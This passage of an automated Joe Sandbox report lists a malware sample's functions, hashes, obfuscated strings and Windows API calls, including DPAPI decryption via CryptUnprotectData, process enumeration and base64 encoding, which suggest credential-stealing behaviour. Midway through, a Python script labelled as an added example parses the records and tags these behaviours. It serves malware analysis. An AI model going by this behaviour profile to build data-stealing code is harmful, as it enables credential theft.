                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                        • String ID:
                        • API String ID: 3040284667-0
                        • Opcode ID: 3d04100d58e30fc383966f1b38ebe69aa1e268b4ca4b30d984eedca6c34fbdab
                        • Instruction ID: 45524455dbe1ee2cd4d9c7f7dd8955aba2b6538e038290d87576cab498cde87a
                        • Opcode Fuzzy Hash: 3d04100d58e30fc383966f1b38ebe69aa1e268b4ca4b30d984eedca6c34fbdab
                        • Instruction Fuzzy Hash: 7F21E2B1518301AF8354DF69E88585FBBF8EED8214F509A1EF599C3264EB70D5088BA2
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0090775E
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00907765
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0090778D
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 009077AD
                        • LocalFree.KERNEL32(?), ref: 009077B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: 6813467a471e6a16a91ae883d5ed2b4ca3ada515e0c5325e445f67fe7642b6ac
                        • Instruction ID: e29a4ccb04d86482b8de95fbc65e552cb7e627681cf728fad2d30e8ffe1165ef
                        • Opcode Fuzzy Hash: 6813467a471e6a16a91ae883d5ed2b4ca3ada515e0c5325e445f67fe7642b6ac
                        • Instruction Fuzzy Hash: 58011E75B44318BBEB14DB949C4AFAE7B78EB44B11F104155FA09EB2C0DAB0A9008B90
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ;zo$bKu$|=w$?
                        • API String ID: 0-3184116080
                        • Opcode ID: 97644243c79ae4a63060515e6c97d76fd2eed15d5a754187bfff63f8313bf31f
                        • Instruction ID: fa6fa37fafe3e637745932e56cfea75dee18848edbb21b58fb1ee32d72b236ab
                        • Opcode Fuzzy Hash: 97644243c79ae4a63060515e6c97d76fd2eed15d5a754187bfff63f8313bf31f
                        • Instruction Fuzzy Hash: 4AB206F3A082049FE314AE2DEC8577AFBE9EF94720F1A453DEAC4C3744E53598058696
                        APIs
                          • Part of subcall function 009271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 009271FE
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00923A96
                        • Process32First.KERNEL32(00000000,00000128), ref: 00923AA9
                        • Process32Next.KERNEL32(00000000,00000128), ref: 00923ABF
                          • Part of subcall function 00927310: lstrlen.KERNEL32(------,00905BEB), ref: 0092731B
                          • Part of subcall function 00927310: lstrcpy.KERNEL32(00000000), ref: 0092733F
                          • Part of subcall function 00927310: lstrcat.KERNEL32(?,------), ref: 00927349
                          • Part of subcall function 00927280: lstrcpy.KERNEL32(00000000), ref: 009272AE
                        • CloseHandle.KERNEL32(00000000), ref: 00923BF7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        • Opcode ID: 97cf7aabf94d408b79abf50960994e605be8d8dd3ecf1302032569b23d0c636f
                        • Instruction ID: cb0cad70d27a2538fc3e326ad5ab178ed365e1a4b36fbc3c9706c9590a896691
                        • Opcode Fuzzy Hash: 97cf7aabf94d408b79abf50960994e605be8d8dd3ecf1302032569b23d0c636f
                        • Instruction Fuzzy Hash: 78810930904224DFC714CF19E948BA5B7F5FB44315F29C1A9D409AB2B6D77A9D86CF80
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0090EA76
                        • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0090EA7E
                        • lstrcat.KERNEL32(0092CFEC,0092CFEC), ref: 0090EB27
                        • lstrcat.KERNEL32(0092CFEC,0092CFEC), ref: 0090EB49
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • String ID:
                        • API String ID: 189259977-0
                        • Opcode ID: 2305b5c6841e12ee178d35e2e9a5af056e98817538e8f8510abb79fc9ae2e773
                        • Instruction ID: a37cb735e1b565599bb30ba355d8c7ba6e7aa6044d709a7113fa1dd7c6f67945
                        • Opcode Fuzzy Hash: 2305b5c6841e12ee178d35e2e9a5af056e98817538e8f8510abb79fc9ae2e773
                        • Instruction Fuzzy Hash: F231A475A00229ABDB109B99EC45FEFB77DDF84705F1441A5FA09E3280DBB45A04CBA2
                        APIs
                        • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 009240CD
                        • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 009240DC
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009240E3
                        • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00924113
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptHeapString$AllocateProcess
                        • String ID:
                        • API String ID: 3825993179-0
                        • Opcode ID: 1e8cca4b04c9828b5b260c80903de4b743fb4738d9e426cdb5016d6343af3631
                        • Instruction ID: 8b20ab7d3fe18ebce06f07b9d3b7b1cd11f40ee385e5af39bd43a1a260fa3cda
                        • Opcode Fuzzy Hash: 1e8cca4b04c9828b5b260c80903de4b743fb4738d9e426cdb5016d6343af3631
                        • Instruction Fuzzy Hash: DB011E70600215ABDB109FA5EC85B6A7BADEF45311F108159BD0987240DE719940CB55
                        APIs
                        • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00909B3B
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00909B4A
                        • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00909B61
                        • LocalFree.KERNEL32 ref: 00909B70
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID:
                        • API String ID: 4291131564-0
                        • Opcode ID: f37b747c7e216d2491029aff409db848ba8b7ba18457fd5ca4382c09baf3c6b9
                        • Instruction ID: e310db67ff04b86b11fd425c638fb57d5a0f1115cc3b99a853c9f2cb211c70f6
                        • Opcode Fuzzy Hash: f37b747c7e216d2491029aff409db848ba8b7ba18457fd5ca4382c09baf3c6b9
                        • Instruction Fuzzy Hash: E3F0BD703443127BE7305F65AC49F567BACEF04B61F240514FA45EA2D0DBB49880CAA4
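An added example, not part of the Joe Sandbox report: a Python script that parses the per-function API records in this section, recomputes the "API ID" similarity fingerprint from the listed API names, and tags each function with the behaviour its API set and flag values imply. The fingerprint rule and the filler-token list (Get, To, Rtl, Co, A) are inferred from the records on this page alone and reproduce every API ID shown here, but they are not Joe Security's published algorithm; the behaviour tags, the record parser and the `check` helper are this example's own, and the CRYPT_STRING_* constants are the wincrypt.h values. It generalises beyond the two records it embeds and runs on any "APIs" block pasted from a report of this shape.

```python
"""Joe Sandbox "API ID" fingerprint reconstruction and behaviour tags for per-function API lists.
Added example, not part of the report: the fingerprint rule (CamelCase tokens, filler dropped,
grouped by count descending, ASCII-sorted per group, joined with '$') is inferred from this page."""
import re
from collections import Counter

FILLER = {"Get", "To", "Rtl", "Co", "A"}     # assumption: inferred from this page's records only
ALLOCATORS = {"RtlAllocateHeap", "LocalAlloc", "HeapAlloc", "VirtualAlloc"}
CRYPT_STRING_BASE64 = 0x00000001             # wincrypt.h
CRYPT_STRING_NOCRLF = 0x40000000             # wincrypt.h
_TOKEN = re.compile(r"[A-Z][a-z0-9]*|[a-z0-9]+")
# "• Name.MODULE(args), ref: ADDR"  or  "• Part of subcall function X: Name.MODULE ref: ADDR"
_CALL = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z0-9_]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

def tokens(api_name):
    return [t for t in _TOKEN.findall(api_name) if t not in FILLER]

def api_id(api_names):
    """Fingerprint for one function from every direct and subcall API name it lists."""
    counts = Counter(t for n in api_names for t in tokens(n))
    groups = {}
    for tok, c in counts.items():
        groups.setdefault(c, []).append(tok)
    return "$".join("".join(sorted(groups[c])) for c in sorted(groups, reverse=True))

def parse_records(text):
    """Split report text at each 'APIs' header; returns [(calls, declared_api_id), ...]."""
    records, calls, declared = [], [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            if calls or declared is not None:
                records.append((calls, declared))
            calls, declared = [], None
        elif s.startswith("• API ID:"):
            declared = s.split(":", 1)[1].strip()
        elif (m := _CALL.search(s)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            calls.append({"name": m["name"], "module": m["module"], "args": args, "ref": m["ref"]})
    if calls or declared is not None:
        records.append((calls, declared))
    return records

def capabilities(calls):
    """Behaviour tags for one function, from its API names and the flag values it passed."""
    names = [c["name"] for c in calls]
    tags = set()
    if "CryptUnprotectData" in names:
        tags.add("dpapi-unprotect")
    if {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"} <= set(names):
        tags.add("process-enumeration")
    if {"GetSystemTime", "SystemTimeToFileTime", "ExitProcess"} <= set(names):
        tags.add("time-check-then-exit")
    for i, c in enumerate(calls):
        if c["name"] not in ("CryptBinaryToStringA", "CryptStringToBinaryA"):
            continue
        try:                      # dwFlags is the 3rd parameter; the sandbox prints '?' for
            flags = int(c["args"][2], 16)   # values it could not recover, so treat as a hint
        except (IndexError, ValueError):
            flags = None
        if flags is not None and flags & 0xFFFF == CRYPT_STRING_BASE64:  # low bits pick the format
            way = "encode" if c["name"] == "CryptBinaryToStringA" else "decode"
            tags.add(f"base64-{way}" + ("-nocrlf" if flags & CRYPT_STRING_NOCRLF else ""))
        # The same API called again after an allocator: the first call only asked for the size.
        later = names[i + 1:]
        if c["name"] in later and ALLOCATORS & set(later[:later.index(c["name"])]):
            tags.add("size-query-then-fill")
    return sorted(tags)

# Two records copied verbatim from this report: the process walker and the base64 encoder.
SAMPLE = """\
APIs
  • Part of subcall function 009271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 009271FE
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00923A96
• Process32First.KERNEL32(00000000,00000128), ref: 00923AA9
• Process32Next.KERNEL32(00000000,00000128), ref: 00923ABF
  • Part of subcall function 00927310: lstrlen.KERNEL32(------,00905BEB), ref: 0092731B
  • Part of subcall function 00927310: lstrcpy.KERNEL32(00000000), ref: 0092733F
  • Part of subcall function 00927310: lstrcat.KERNEL32(?,------), ref: 00927349
  • Part of subcall function 00927280: lstrcpy.KERNEL32(00000000), ref: 009272AE
• CloseHandle.KERNEL32(00000000), ref: 00923BF7
• API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
APIs
• CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 009240CD
• GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 009240DC
• RtlAllocateHeap.NTDLL(00000000), ref: 009240E3
• CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00924113
• API ID: BinaryCryptHeapString$AllocateProcess
"""

def check(text=SAMPLE):
    """Recompute each record's fingerprint and compare it with the one the report printed."""
    return [(calls[0]["ref"], api_id(c["name"] for c in calls) == declared, capabilities(calls))
            for calls, declared in parse_records(text)]
```

Running `check()` on the embedded records confirms both fingerprints and yields `process-enumeration` for the Toolhelp32 walker and `base64-encode-nocrlf` plus `size-query-then-fill` for the CryptBinaryToStringA function: 0x40000001 is CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, and the allocation sandwiched between two calls to the same API is the usual size-query-then-fill idiom. The flag check deliberately yields nothing when the sandbox printed `?` in the dwFlags slot, as it does for the CryptStringToBinaryA call at 0090EA7E, because positional argument capture in these records is too noisy to guess from.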
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: A!V=$Qk;}$[aTG
                        • API String ID: 0-3081522449
                        • Opcode ID: 0a52a8de4a25df67afafd40993e5a2bef14d0b4816c2aeebde626b4ec751daaf
                        • Instruction ID: d017ea586ef985adfdf761ebd7d797949ba755344b97f13b3d8bc083f52f7437
                        • Opcode Fuzzy Hash: 0a52a8de4a25df67afafd40993e5a2bef14d0b4816c2aeebde626b4ec751daaf
                        • Instruction Fuzzy Hash: BBB2F7F3A082009FE304AE2DDC8567ABBE5EF94720F1A893DEAC5C3744E63558158697
                        APIs
                        • CoCreateInstance.COMBASE(0092B110,00000000,00000001,0092B100,?), ref: 0091CB06
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0091CB46
                        • lstrcpyn.KERNEL32(?,?,00000104), ref: 0091CBC9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                        • String ID:
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00909B9F
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00909BB3
                        • LocalFree.KERNEL32(?), ref: 00909BD7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: L<s$*}
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ,?l~$s,2/
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: @\vz
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: G^bk
                        Memory Dump Source
